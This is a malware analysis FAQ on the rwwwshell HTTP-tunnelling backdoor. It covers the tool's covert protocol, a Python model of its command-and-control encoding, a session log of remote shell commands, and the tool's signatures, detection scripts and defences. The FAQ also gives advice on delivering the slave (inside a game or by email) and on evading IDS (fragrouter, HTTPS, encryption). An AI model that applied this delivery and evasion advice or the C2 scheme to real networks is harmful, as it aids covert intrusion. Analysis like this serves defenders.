Malware FAQ: Reverse WWW Tunnel Backdoor

Author: Chris Young

Exploit Details:

Name: Reverse WWW Tunnel Backdoor

Filename: rwwwshell-1_6_perl.txt or

Version: 1.6

Author: van Hauser


Operating system: OS independent in principle, since it runs under any Perl interpreter; in practice its main focus is Linux, FreeBSD and Solaris.

Brief Description: A proof-of-concept tool that gives an attacker command (typically shell) access to a remote system through firewalls by carrying the traffic inside ordinary-looking HTTP requests.


Reverse WWW Tunnel Backdoor (RW3) is a tool that lets two systems interact over the HTTP protocol. It was written as a proof-of-concept script in 1998 by van Hauser of THC (The Hacker's Choice), the group also known for the THC-Scan war dialler.

The script was written to test whether a tool could circumvent firewalls by camouflaging its communications inside what looks like a normal HTTP session.

Written in Perl, the original script has gone through a few iterations to reach the current version, 1.6, gaining portability across Unix Perl builds and proxy support along the way.

Protocol: HTTP

The script uses the HTTP GET method to carry encoded information in a way that resembles natural web browsing traffic. The slave, not the master, initiates every connection: it calls out to the master on a port that firewalls normally allow for web traffic, so the back door works from behind a firewall that blocks all inbound connections.

HTTP normally runs over TCP (port 80) and is a plain-text protocol, so its requests and responses read almost like English and can be inspected with any packet sniffer.

Description of Variants

There are currently no direct descendants of this program ported to other platforms, probably because Perl itself is available on so many platforms that the script does not need porting.

There is a similar C-based competitor from 'nocrew', under more active development, called httptunnel (version 3.3), which can tunnel other protocols through its HTTP connection. More information on this can be found at , and a review of its functionality can be found at .

How the exploit works

The script changes its own process name (by assigning the mask to Perl's $0) to camouflage its presence on the host. By default it calls itself 'vi'; this does not work under Windows NT/2000 Professional, but if it did, 'Explorer' or 'Taskmgr' would be simple to substitute and more appropriate for a Windows platform.

The script uses $CGI_PREFIX as the path portion of the URL it requests through the firewall (the capture in the Appendix shows /cgi-bin/order?). The uuencoded message is appended after the '?', so the request looks like a CGI call with a query string; on each side the decoded data is fed to and read from STDIN and STDOUT of the master and slave.

Using a /cgi-bin/ path with a query string also discourages proxies from caching the exchange, because it mimics the normal way of passing parameters to CGI programs, and it makes the traffic look like ordinary dynamic web requests.

Once the slave receives the master's message, it uudecodes it and passes the command to the configured shell ($Shell, line 40). The output is collected and, after the agreed delay ($Delay, line 41), sent back to the master in the same fashion on the slave's next connection.

Common items found in the CGI directory are:
Xbase, Mysql, Form, Common, Status, FCGI, Printenv and test-cgi

Changing line 27 so that the GET request uses one of these names instead will make the requests look more natural and further confuse IDS systems.

Should anyone attempt to access the server without the script and password, they would get the following error message in an attempt to confuse them:

The error is produced by the following routine, which returns a page whose title and body claim that the requested file no longer exists:

sub hide_as_broken_webserver { # invalid request -> look like broken server
    send (S, "<HTML><HEAD>\n<TITLE>404 File Not Found</TITLE>\n</HEAD>".
             "<BODY>\n<H1>File Not Found</H1>\n</BODY></HTML>\n", 0);
    close S;
    print STDOUT "Warning! Illegal server access!\n"; # report to user
    goto YOP;                   # back to the accept loop in the full script
}
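As an added illustration (not code from the original page or from the script itself), the following Python models the exchange described above: the slave polls with a GET whose query string carries the password and the output of the last command, the master answers with the next command encoded the same way, and anything that is not a correctly encoded request with the right password receives the fake 404 body from hide_as_broken_webserver. The password THC and the path /cgi-bin/order? are taken from the capture in the Appendix. The URL-safe encoding step is an assumption: the real script rewrites uuencode punctuation into lowercase letters (the capture shows '#' as 'l' and '$' as 'm'), whereas this example percent-encodes, so the three bytes THC that appear as 5mAl in the capture come out here as %235%24A%23.

```python
"""Model of the Reverse WWW Tunnel exchange: the slave polls the master with
a GET whose query string carries the data; the master answers in the body."""
import binascii
import re
from urllib.parse import quote, unquote

PASSWORD = "THC"                  # shared secret prefixed to every message
CGI_PREFIX = "/cgi-bin/order?"    # script default; a request must start with it
# Body returned to anyone who is not a slave with the right password
# (same text as hide_as_broken_webserver).
FAKE_404 = ("<HTML><HEAD>\n<TITLE>404 File Not Found</TITLE>\n</HEAD>"
            "<BODY>\n<H1>File Not Found</H1>\n</BODY></HTML>\n")


def encode(data):
    """uuencode in 45-byte lines, drop the newlines, then make the result
    URL-safe.  ASSUMPTION: the real script rewrites uuencode punctuation
    into lowercase letters ('#' -> 'l', '$' -> 'm' in the Appendix);
    percent-encoding is used here instead and is not the script's table."""
    lines = [binascii.b2a_uu(data[i:i + 45]).rstrip(b"\n")
             for i in range(0, len(data), 45)]
    return quote(b"".join(lines), safe="")


def decode(token):
    """Reverse encode(): every uuencode line announces its own length in its
    first character, so the concatenated lines can be split up again."""
    raw = unquote(token).encode("latin-1")
    out, pos = b"", 0
    while pos < len(raw):
        n = (raw[pos] - 32) & 0x3F            # bytes on this line
        width = 1 + ((n + 2) // 3) * 4        # length char + 4 chars per 3 bytes
        out += binascii.a2b_uu(raw[pos:pos + width])
        pos += width
    return out


def slave_request(output):
    """What the slave puts on the wire: password + output of the last command."""
    return "GET %s%s HTTP/1.0\n\n" % (CGI_PREFIX, encode(PASSWORD.encode() + output))


def master_handle(request, next_command):
    """Master side.  Returns (reply body, decoded slave output) for a valid
    slave, or (FAKE_404, None) for anything else, as the script does."""
    m = re.match(r"GET (\S+) HTTP/1\.[01]", request)
    if not m or not m.group(1).startswith(CGI_PREFIX):
        return FAKE_404, None
    try:
        data = decode(m.group(1)[len(CGI_PREFIX):])
    except ValueError:                        # binascii.Error is a ValueError
        return FAKE_404, None
    if not data.startswith(PASSWORD.encode()):
        return FAKE_404, None
    reply = encode(PASSWORD.encode() + next_command.encode())
    return reply, data[len(PASSWORD):]


def slave_handle(reply):
    """Slave side: check the password and return the command to run."""
    data = decode(reply)
    if not data.startswith(PASSWORD.encode()):
        return None
    return data[len(PASSWORD):].decode()


if __name__ == "__main__":
    first = slave_request(b"")                # first call-in, no output yet
    reply, _ = master_handle(first, "cd / ; dir")
    print(first.strip())
    print("master ->", reply, "=>", slave_handle(reply))
```

Run it directly to see a first call-in and the master's reply. No sockets are needed to follow the protocol; the point of the decode() loop is that each uuencode line carries its own length byte, which is why the script can strip the newlines and still recover the data on the other side.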


To run the script on a remote system, the attacker first needs a certain amount of information:

•  Knowledge of target operating system
•  Is Perl installed?
•  Is a proxy needed?
•  Does the proxy require a password?

Once this information has been ascertained, it is possible to determine the best form of attack.

Direct access: If the system has been compromised earlier, or the attacker has access for some other reason, the above information is easily gathered and the script can simply be run with whatever settings are preferred.

Via e-mail: Sending the script by e-mail is probably the most problematic method, because the above information is not readily available. Targeting Unix-based systems would still give a reasonable chance of success, as they are more likely to have Perl installed.

A further problem is that, while many Unix-based web servers have Perl installed, few users or administrators use those systems to retrieve or read mail.

Windows/Intel systems could be targeted by wrapping a compiled version of the script inside another program (a game, for example) with a tool such as Silk . This would remove the need for a Perl interpreter on the host, but would depend on the compiler's ability to overcome the Windows fork() problem described under 'Problems running under Windows' below.

How to use the exploit

The original version (v1.6) accepts only one real argument, '-h', which prints the help text.

Any other text after the script name switches the default running mode from Master to Slave, using the internal variables defined at the top of the script for the target address, port and so on.

The version I altered as an aid to understanding the attack method takes the following parameters:

perl Target-addr port
(some systems do not require the preceding 'perl')

Target-addr is either an IP address or an FQDN (fully qualified domain name) and port is the TCP port over which to communicate. If no port is given, the script assumes 8080.

For the script to pass through firewalls in the intended way it should use port 80, 8080 or 443, although any port will work as long as it is not already in use on the target or host system and the firewall lets it out.

Many other settings could be changed, such as the process name, proxy user and password. If these were converted to command-line options, a proper parser for @ARGV should be considered rather than reading $ARGV[n] positionally.

Example of a Windows NT Master (attacker) and a Linux system

The following is the output from both the Master and slave for a simple session using

C:\> perl
Welcome to the Reverse-WWW-Tunnel-Backdoor v1.6 by van Hauser / THC ...
Introduction: Wait for your SLAVE to connect, examine it's output and then
type in your commands to execute on SLAVE. You'll have to
wait min. the set $DELAY seconds before you get the output
and can execute the next stuff. Use ";" for multiple commands.
Trying to execute interactive commands may give you headache
so beware. Your SLAVE may hang until the daily connect try
(if set - otherwise you lost).
You also shouldn't try to view binary data too ;-)
"echo bla >> file", "cat >> file <<- EOF", sed etc. are your
friends if you don't like using vi in a delayed line mode ;-)
To exit this program on any time without doing harm to either
MASTER or SLAVE just press Control-C.
Now have fun.

Waiting for connect ... connect from unresolved/
[Warning! No output from remote!]
> dir

Waiting for connect ... connect from unresolved/
ghost ntfsdos.exe rmtshare.exe

Waiting for connect ... connect from unresolved/
cd / ; dir

Waiting for connect ... connect from unresolved/
bin dev home lost+found opt root tmp usr
boot etc lib mnt proc sbin tools var

Waiting for connect ... ^C


#perl 8080
starting in slave mode to on port 8080
Items in bold are input from the attacker, and italics are responses from the remote system.

As you can see, the first example is a simple 'dir' (Linux accepts this, and I like the formatting), whereas the second, 'cd / ; dir', demonstrates the system's ability to take multiple commands on one line separated by a ';' (semicolon).

As you would expect, not much happens on the slave (attacked) system to indicate any activity.

Options for change:

Lines 27 through 49 allow simple changes to the behaviour of the script. In order, they set:

•  HTTP path used to hide among normal traffic
•  Name of the local command to show in the process table
•  Password to prevent other RW3 slaves using your Master
•  Port on which the traffic will initiate
•  IP address of the Master
•  Command that should run on the slave once connected
•  Time in seconds to delay output from commands
•  When connections should be initiated (leave blank for now)
•  Whether the connection should be repeated daily
•  IP address of the internal proxy server
•  Port over which the proxy traffic will travel
•  User ID used to authenticate with the proxy server
•  Password for the above
•  Whether to enable specific script debugging output
•  Fix for the AIX and OpenBSD recv() network problem

There is no easy way to carry out this attack by hand, because the server (slave) component must already be running at the remote site; by the nature of the tool, the master simply sits and waits for compromised systems to call in.

Signature of the attack

On NT the following are visible when reviewing the Task Manager:

This clearly shows that the $Mask setting on line 28 has no effect on Windows.

On the Linux system the script shows up in the process table in the following way:

root 1075 1071 0 11:42 pts/0 00:00:00 bash
root 1108 1105 0 11:47 pts/1 00:00:00 bash
root 1196 1075 1 12:28 pts/0 00:00:00 vi
root 1197 1196 0 12:28 pts/0 00:00:00 /bin/sh
root 1198 1108 0 12:29 pts/1 00:00:00 ps -ef
NB: The above table has been cut down to show only the relevant information.

In the above table the attacker's process has been hidden behind 'vi' (PID 1196); the shell it spawned to run commands (PID 1197, /bin/sh) is still visible as its child. Note that the mask only changes the name shown by ps: on Linux, /proc/1196/exe would still point at the Perl interpreter.
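An added example (not from the page or the script) of turning the process-table signature into a check: it parses `ps -ef` output, rebuilds parent/child links and reports any process that calls itself by a disguise name and has a shell as a direct child, which is what the Perl slave looks like while it runs $Shell. The sample rows are the ps -ef lines shown above; the disguise names other than 'vi' are this example's own guesses. A real editor can also spawn a shell (vi's :!command does exactly that), so treat a hit as a triage lead and confirm it, on Linux, by comparing /proc/<pid>/exe with the name ps shows.

```python
"""Flag process-table entries that look like rwwwshell's default disguise:
a process calling itself 'vi' whose direct child is a shell."""

# ps -ef rows from the Linux slave in the text above (header added).
PS_SAMPLE = """\
UID PID PPID C STIME TTY TIME CMD
root 1075 1071 0 11:42 pts/0 00:00:00 bash
root 1108 1105 0 11:47 pts/1 00:00:00 bash
root 1196 1075 1 12:28 pts/0 00:00:00 vi
root 1197 1196 0 12:28 pts/0 00:00:00 /bin/sh
root 1198 1108 0 12:29 pts/1 00:00:00 ps -ef
"""

# 'vi' is the script's default $Mask; the rest are this example's guesses at
# equally innocuous names an attacker might substitute.
DISGUISES = {"vi", "vim", "emacs", "less", "more"}
SHELLS = {"sh", "bash", "ksh", "csh", "tcsh", "zsh"}


def parse_ps(text):
    """Parse `ps -ef` rows (UID PID PPID C STIME TTY TIME CMD) into a dict keyed by pid."""
    procs = {}
    for line in text.splitlines():
        fields = line.split(None, 7)          # CMD keeps its own spaces
        if len(fields) < 8 or not fields[1].isdigit():
            continue                          # header or blank line
        procs[int(fields[1])] = {"uid": fields[0], "pid": int(fields[1]),
                                 "ppid": int(fields[2]), "cmd": fields[7]}
    return procs


def basename(cmd):
    """'/bin/sh -c x' -> 'sh'; 'ps -ef' -> 'ps'."""
    return cmd.split()[0].rsplit("/", 1)[-1]


def find_masked_shells(procs):
    """Return (parent pid, parent cmd, child pid, child cmd) for every
    disguised process that has a shell as a direct child."""
    hits = []
    for proc in procs.values():
        parent = procs.get(proc["ppid"])
        if (parent is not None and basename(parent["cmd"]) in DISGUISES
                and basename(proc["cmd"]) in SHELLS):
            hits.append((parent["pid"], parent["cmd"], proc["pid"], proc["cmd"]))
    return hits


if __name__ == "__main__":
    for ppid, pcmd, pid, cmd in find_masked_shells(parse_ps(PS_SAMPLE)):
        print("suspicious: %s (pid %d) spawned %s (pid %d)" % (pcmd, ppid, cmd, pid))
```

On the sample this reports vi (1196) as the parent of /bin/sh (1197), which is exactly the pair highlighted in the table above. Feed it live output with `ps -ef` and follow up each hit with `readlink /proc/<pid>/exe`.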

Output from NETSTAT -NA on a Windows NT system:

Active Connections

Proto Local Address Foreign Address State
The above system is a workstation, and as such would not normally have port 80 in listening mode.

The following is the output from netstat -na on a Linux system when the script is running in master mode (listening for slaves):

Active Internet connections (servers and established)

Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0* LISTEN
A scan of the attack in progress is in Appendix B, with the payload areas in bold.

The following Perl script can be used to recover the password and message from the payload of a request captured by Snort.

# Undo the script's letter substitution, then uudecode.
$test = $ARGV[0];
# second half of this tr/// (the punctuation each letter stands for) is not shown
$test =~ tr/'zcadefghjklmnopqrstuv'
$test =~ tr/b/'/;                 # 'b' stands for the apostrophe
$decoded = unpack "u", $test;
print STDOUT $decoded;
NB: file saved as for this test.

Its input is given on the command line, for example:

perl M5mAl9VAOjW0rdgYT9GvDfWkN97AEdsqR96vY8VQEi

which gives the following output. The first three characters here are the password (this may not be the case for every trace; the length is chosen by the attacker):

THCghost ntfsdos.exe recycled rmtshare.exe
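As an added example (not part of the original document or of Snort), the following Python reads a Snort 1.x text dump like the one in the Appendix, rebuilds each packet's payload from the hex columns and applies three checks that the capture itself supports: the GET query string is an opaque token with no name=value pairs, the request carries no headers at all and ends its lines with a bare LF (the 0A 0A in the dump), and the 'server' answers a GET with data that has no HTTP status line. The three packets embedded as sample input are copied from the Appendix; IP addresses were not preserved there, so packets are matched by MAC address. Treating only PSH frames as carrying data (the bytes shown for pure ACK/SYN/FIN frames being frame padding) is this example's assumption.

```python
"""Read a Snort 1.x text dump (like the Appendix) and flag HTTP that does not
behave like HTTP: opaque query strings, header-less requests, replies with
no status line."""
import re

# Three frames copied from the Appendix: the slave's first call-in, the
# master's reply carrying the command, and the slave returning its output.
SAMPLE_CAPTURE = """\
07/23-12:16:12.335290 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x5A -> TCP TTL:64 TOS:0x0 ID:100 DF
***PA* Seq: 0xB49761F3 Ack: 0xCF33CA Win: 0x7D78
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 72 64 GET /cgi-bin/ord
65 72 3F 6C 35 6D 41 6C 7A 20 48 54 54 50 2F 31 er?l5mAlz HTTP/1
2E 30 0A 0A .0..

07/23-12:16:32.343130 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x48 -> TCP TTL:128 TOS:0x0 ID:2681 DF
***PA* Seq: 0xCF33CA Ack: 0xB4976217 Win: 0x2214
62 35 6D 41 6C 39 67 45 52 73 72 74 74 7A 82 1F b5mAl9gERsrttz..
A2 AC ..

07/23-12:16:38.375378 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0xAC -> TCP TTL:64 TOS:0x0 ID:109 DF
***PA* Seq: 0xB5FB24AA Ack: 0xCF998F Win: 0x7D78
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 72 64 GET /cgi-bin/ord
65 72 3F 4D 35 6D 41 6C 39 56 41 4F 6A 57 30 72 er?M5mAl9VAOjW0r
64 67 59 54 39 47 76 44 66 57 6B 4E 39 37 41 45 dgYT9GvDfWkN97AE
64 73 71 52 39 36 76 59 38 56 51 45 39 73 74 72 dsqR96vY8VQE9str
6A 46 55 54 6A 56 41 41 6A 46 34 4E 39 37 41 45 jFUTjVAAjF4N97AE
7A 31 64 73 71 52 61 52 59 50 66 73 74 72 6A 47 z1dsqRaRYPfstrjG
6A 53 66 52 59 50 66 74 48 74 7A 20 48 54 54 50 jSfRYPftHtz HTTP
2F 31 2E 30 0A 0A /1.0..
"""

HEADER_RE = re.compile(r"^(\d\d/\d\d-\d\d:\d\d:\d\d\.\d+)\s+(\S+)\s+->\s+(\S+).*?TTL:(\d+)")
FLAGS_RE = re.compile(r"^([SFRPAU*]{6})\s+Seq:")
HEX_RE = re.compile(r"^[0-9A-Fa-f]{2}$")
REQUEST_RE = re.compile(r"^GET \S*\?(\S*) HTTP/1\.[01]")


def parse_snort_dump(text):
    """Return a list of packets: time, src/dst (MACs here), ttl, flags, data."""
    packets, cur = [], None
    for line in text.splitlines():
        line = line.strip()
        m = HEADER_RE.match(line)
        if m:
            cur = {"time": m.group(1), "src": m.group(2), "dst": m.group(3),
                   "ttl": int(m.group(4)), "flags": "", "data": bytearray()}
            packets.append(cur)
            continue
        if cur is None or not line:
            continue
        m = FLAGS_RE.match(line)
        if m:
            cur["flags"] = m.group(1)
            continue
        # Hex rows: up to 16 "XX" tokens, then the ASCII rendering (ignored).
        for tok in line.split()[:16]:
            if not HEX_RE.match(tok):
                break
            cur["data"].append(int(tok, 16))
    return packets


def analyse(packets):
    """Return (GET query strings seen, [(time, finding), ...])."""
    queries, findings, pending = [], [], None
    for pkt in packets:
        if "P" not in pkt["flags"]:     # ASSUMPTION: only PSH frames carry data;
            continue                    # bytes on ACK/SYN/FIN frames are padding
        text = bytes(pkt["data"]).decode("latin-1")
        m = REQUEST_RE.match(text)
        if m:
            query = m.group(1)
            queries.append(query)
            if "=" not in query:
                findings.append((pkt["time"], "query string has no name=value pairs"))
            request_line, _, headers = text.partition("\n")
            if not request_line.endswith("\r"):
                findings.append((pkt["time"], "request line terminated by bare LF"))
            if not headers.strip("\r\n"):
                findings.append((pkt["time"], "no request headers (no Host, no User-Agent)"))
            pending = pkt               # wait for the server's answer
        elif pending is not None and pkt["src"] == pending["dst"]:
            if not text.startswith("HTTP/"):
                findings.append((pkt["time"], "server answered a GET without an HTTP status line"))
            pending = None
    return queries, findings


if __name__ == "__main__":
    qs, fs = analyse(parse_snort_dump(SAMPLE_CAPTURE))
    for q in qs:
        print("query:", q)
    for when, why in fs:
        print(when, why)
```

None of the three checks depends on decoding the payload, which is the point: the letter substitution hides the uuencode alphabet, but the script still sends header-less HTTP/1.0 requests with a single opaque token, and its master never sends a status line.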

How to protect against it

Use password protection on your proxies, and change the passwords regularly.

Microsoft Proxy Server can use the authentication built into Internet Explorer, but the Winsock proxy client should not be enabled: it exists to support legacy applications and would let the script out without it having to negotiate the proxy itself, negating the need for its proxy navigation.

Implement good internal security policies and user training.

If your desktops are Windows based, it is possible to restrict users' ability to run unauthorised packages.

Monitor all incoming e-mail and web downloads for the signatures of known attacker tools. This alone would not stop every tool getting in, but it would pique your interest enough to investigate the user in question.

Correlating user login times with system access is possible, although the work involved would be quite onerous, and it would produce many false positives when users do not log out or simply switch their PCs off at night.

The author suggests using a second network, detached from the primary one, for Internet access. That is impracticable for most organisations but would obviously work.

Possible enhancements


Compiling the script with any of the following compilers would remove the products reliance on the target system having Perl installed:

IP address cycling

The ability to vary the target IP address on the slave would further camouflage the packets passing through the firewall and IDSs. Combining cd00r's ability to sniff packets from the wire that are not apparently addressed to it with IP source routing to an address that passes the Master's interface would allow traversal of a firewall without giving away the Master's real address.

Passing through frag-router

As an aid to avoiding some IDSs, the packets could be further obscured by forwarding them through fragrouter, which fragments them enough to confuse earlier or less sophisticated IDSs.


Transition to HTTPS

Currently the use of plain HTTP lets administrators read the actual commands executed once the attack has been detected and the logs or captures analysed. Moving to HTTPS would prevent that while retaining the product's ability to traverse firewalls by masquerading as normal traffic.

Encryption of the payload

Another way to stop administrators reading the contents would be to pass the commands and their output through an encryption package, such as Blowfish, before transmission. The ciphertext would then still need to be uuencoded before it is sent, to avoid transmitting control characters.

Where to get it

As the program is written in Perl, it is possible simply to cut and paste the text from this document into a new file and save it with the usual .pl extension.

NB: The script is in a table, so highlighting the second column, copying it and pasting it into Notepad or similar will be required.

For the latest version the author suggests , although this site was unavailable while this document was being written; the author himself is based at .

The usual repositories retain copies such as:

A number of Perl script interpreters are available from:
although the majority of Linux systems come with it either pre-installed or as some form of package.


The prime dependency is a Perl interpreter with socket support, so that the script can open network connections.

Compatible platforms.

Any platform that supports Perl, however the author has only tested it working on:

•  Linux;
•  Solaris;
•  Open BSD; and
•  AIX.

Although OpenBSD and AIX are reported to have problems with recv() responses, there is a workaround within the script.

Windows NT and 2000 Professional do work as Masters, but the fork() call causes problems in slave mode, as discussed later in this document.

These problems may be resolved by newer versions of the respective Perl interpreters.

Problems running under Windows

The 'Master' part of the script has no problems on either Windows NT or Windows 2000 Professional, but the 'Slave' portion reports the following errors:

starting in slave mode to on port 8080

Slave activated
Bizarre SvTYPE [193] at line 137.

Which relates to the following line of code:
$pid = fork;

Investigating the ActivePerl implementation (5.6.0 build 623) shows that fork is merely emulated under Windows, because the operating system has no native fork() system call.

The following is a quote from the ActivePerl manual:

"On some platforms such as Windows where the fork() system call is not available, Perl can be built to emulate fork() at the interpreter level. While the emulation is designed to be as compatible as possible with the real fork() at the level of the Perl program, there are certain important differences that stem from the fact that all the pseudo child ``processes'' created this way live in the same real process as far as the operating system is concerned."

The script shows none of these problems under Linux (Red Hat 7). Its author does recognise that Perl implementations differ, however: lines 49, 206 and 268 turn on a kludge to get round a problem encountered with OpenBSD and AIX.

Since the problem is in the code that forks a new process, one option would be to remove the fork and accept that a command run by the attacker might hang the process. The script would work, but any error or crash would end the remote access. That could be worked around by using the 'at' command to start the script at a specific time instead of relying on the fork, at the cost of the command showing up in the 'at' queue.

The best solution is to obtain a Perl build whose fork() works properly, or to find another way of running the script.


Overall, this is a well thought out and executed script that clearly achieves its goal as a proof of concept. It is reasonably well documented, which lends itself to simple tweaks and enhancements by people at all programming levels.

Although development appears to have ceased, the methods it uses still work today, and with a few of the suggested improvements it could become a formidably stealthy tool.

The current dependency on a Perl interpreter limits how widely the script can propagate, but compiling it with a Perl compiler or rewriting it in C would be relatively simple.

With Microsoft seemingly encouraging tunnelling over common ports by giving developers code that carries control (RPC) calls through firewalls, it can only be a short time before encryption is added to tools like this and the battle sways in favour of the attacker.

Additional Information

ActiveState ActivePerl HTML manual - Software install required

An interesting article on how to find backdoors in Firewalls can be found at:

nocrew's httptunnel software can be found at:

A useful repository of attacker software and information can be found at:

A useful source of security information can be found at:

The inspiration for this document came from a training seminar given at the SANS Baltimore conference by Eric Cole and Edward Skoudis in 2001. Kind permission to extend the information found in the training course was given by Eric Cole.

Appendix - Snort scan

-*> Snort! <*-
Version 1.3.1
By Martin Roesch (,
Decoding Ethernet on interface eth0

07/23-12:16:12.335290 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x5A -> TCP TTL:64 TOS:0x0 ID:100 DF
***PA* Seq: 0xB49761F3 Ack: 0xCF33CA Win: 0x7D78
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 72 64 GET /cgi-bin/ord
65 72 3F 6C 35 6D 41 6C 7A 20 48 54 54 50 2F 31 er?l5mAlz HTTP/1
2E 30 0A 0A .0..

07/23-12:16:12.460256 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40 -> TCP TTL:128 TOS:0x0 ID:62072 DF
****A* Seq: 0xCF33CA Ack: 0xB4976217 Win: 0x2214
00 00 00 00 00 00 74 A2 57 4D ......t.WM
07/23-12:16:32.343130 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x48 -> TCP TTL:128 TOS:0x0 ID:2681 DF
***PA* Seq: 0xCF33CA Ack: 0xB4976217 Win: 0x2214
62 35 6D 41 6C 39 67 45 52 73 72 74 74 7A 82 1F b5mAl9gERsrttz..
A2 AC ..

07/23-12:16:32.343231 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x36 -> TCP TTL:64 TOS:0x0 ID:104 DF
****A* Seq: 0xB4976217 Ack: 0xCF33D8 Win: 0x7D78

07/23-12:16:32.343310 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40 -> TCP TTL:128 TOS:0x0 ID:2937 DF
*F**A* Seq: 0xCF33D8 Ack: 0xB4976217 Win: 0x2214
00 00 00 00 00 00 D8 01 AD 9A ..........

07/23-12:16:32.343423 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x36 -> TCP TTL:64 TOS:0x0 ID:105 DF
****A* Seq: 0xB4976217 Ack: 0xCF33D9 Win: 0x7D78

07/23-12:16:33.353858 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x36 -> TCP TTL:64 TOS:0x0 ID:106 DF
*F**A* Seq: 0xB4976217 Ack: 0xCF33D9 Win: 0x7D78

07/23-12:16:33.354093 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40 -> TCP TTL:128 TOS:0x0 ID:3193 DF
****A* Seq: 0xCF33D9 Ack: 0xB4976218 Win: 0x2214
00 00 00 00 00 00 46 C9 14 97 ......F...

07/23-12:16:38.374391 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x4A -> TCP TTL:64 TOS:0x0 ID:107 DF
S***** Seq: 0xB5FB24A9 Ack: 0x0 Win: 0x7D78
TCP Options => MSS: 1460 Opt 4:TS: 380335 0 NOP WS: 0

07/23-12:16:38.374654 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40 -> TCP TTL:128 TOS:0x0 ID:3449 DF
S***A* Seq: 0xCF998E Ack: 0xB5FB24AA Win: 0x2238
TCP Options => MSS: 1460
00 00 B2 39 47 A4 ...9G.

07/23-12:16:38.374728 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0x36 -> TCP TTL:64 TOS:0x0 ID:108 DF
****A* Seq: 0xB5FB24AA Ack: 0xCF998F Win: 0x7D78

07/23-12:16:38.375378 0:80:C7:79:C6:A3 -> 0:8:C7:FE:20:69 type:0x800 len:0xAC -> TCP TTL:64 TOS:0x0 ID:109 DF
***PA* Seq: 0xB5FB24AA Ack: 0xCF998F Win: 0x7D78
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 72 64 GET /cgi-bin/ord
65 72 3F 4D 35 6D 41 6C 39 56 41 4F 6A 57 30 72 er?M5mAl9VAOjW0r
64 67 59 54 39 47 76 44 66 57 6B 4E 39 37 41 45 dgYT9GvDfWkN97AE
64 73 71 52 39 36 76 59 38 56 51 45 39 73 74 72 dsqR96vY8VQE9str
6A 46 55 54 6A 56 41 41 6A 46 34 4E 39 37 41 45 jFUTjVAAjF4N97AE
7A 31 64 73 71 52 61 52 59 50 66 73 74 72 6A 47 z1dsqRaRYPfstrjG
6A 53 66 52 59 50 66 74 48 74 7A 20 48 54 54 50 jSfRYPftHtz HTTP
2F 31 2E 30 0A 0A /1.0..

07/23-12:16:38.490980 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40 -> TCP TTL:128 TOS:0x0 ID:3961 DF
****A* Seq: 0xCF998F Ack: 0xB5FB2520 Win: 0x21C2
00 00 00 00 00 00 06 6B 15 B9 .......k..

07/23-12:17:01.405007 0:8:C7:FE:20:69 -> 0:80:C7:79:C6:A3 type:0x800 len:0x40 -> TCP TTL:128 TOS:0x0 ID:12153 DF
***PA* Seq: 0xCF998F Ack: 0xB5FB2520 Win: 0x21C2
6C 35 6D 41 6C 7A 36 83 D0 84 l5mAlz6...